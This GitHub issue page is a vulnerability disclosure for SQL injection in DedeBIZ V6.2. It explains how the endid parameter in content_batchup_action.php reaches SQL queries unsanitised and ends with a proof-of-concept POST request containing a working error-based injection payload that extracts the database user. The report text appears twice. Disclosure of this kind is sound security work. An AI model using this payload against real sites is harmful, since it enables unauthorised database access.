You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
[Suggested description]
SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/content_batchup_action.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product] https://github.com/DedeBIZ/DedeV6
[Affected Product Code Base]
DedeBIZ V6.2
[Affected Component]
File: /src/admin/content_batchup_action.php
Parameter: endid
[Attack Type]
Remote
[Cause of vulnerability]
in /src/admin/content_batchup_action.php,there is possibility of sql injection is the sql statement ‘$dsql->SetQuery("SELECT id FROM #@__archives $gwhere");’
In this code, $gwhere is controlled by $endid in the above statement.
if ($endid > $startid) $gwhere .= " AND id<= $endid ";
For $endid, only single quotes are globally filtered without any other protection. $endid is directly concatenated in $gwhere, and $gwhere is directly concatenated in SQL statements,
$dsql->SetQuery("SELECT id,arcrank FROM #@__arctiny $gwhere");
What is more,directly access the PHP file, which can receive data from post requests and select parameters. $endid can be controlled by attackers in post data
[Suggested description]
SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/content_batchup_action.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
https://github.com/DedeBIZ/DedeV6
[Affected Product Code Base]
DedeBIZ V6.2
[Affected Component]
File: /src/admin/content_batchup_action.php
Parameter: endid
[Attack Type]
Remote
[Cause of vulnerability]
in /src/admin/content_batchup_action.php,there is possibility of sql injection is the sql statement ‘$dsql->SetQuery("SELECT id FROM
#@__archives
$gwhere");’In this code, $gwhere is controlled by $endid in the above statement.
if ($endid > $startid) $gwhere .= " AND id<= $endid ";
For $endid, only single quotes are globally filtered without any other protection. $endid is directly concatenated in $gwhere, and $gwhere is directly concatenated in SQL statements,
$dsql->SetQuery("SELECT id,arcrank FROM
#@__arctiny
$gwhere");What is more,directly access the PHP file, which can receive data from post requests and select parameters. $endid can be controlled by attackers in post data
Therefore ,the sql injection exists.
[Vulnerability demonstration]
Request url
http://localhost:8086/admin/content_batchup_action.php
Postdata
dopost=go&typeid=1&startid=1&userid=1&action=check&&endid=extractvalue(1,concat(0x7e,(select user()),0x7e))
The text was updated successfully, but these errors were encountered: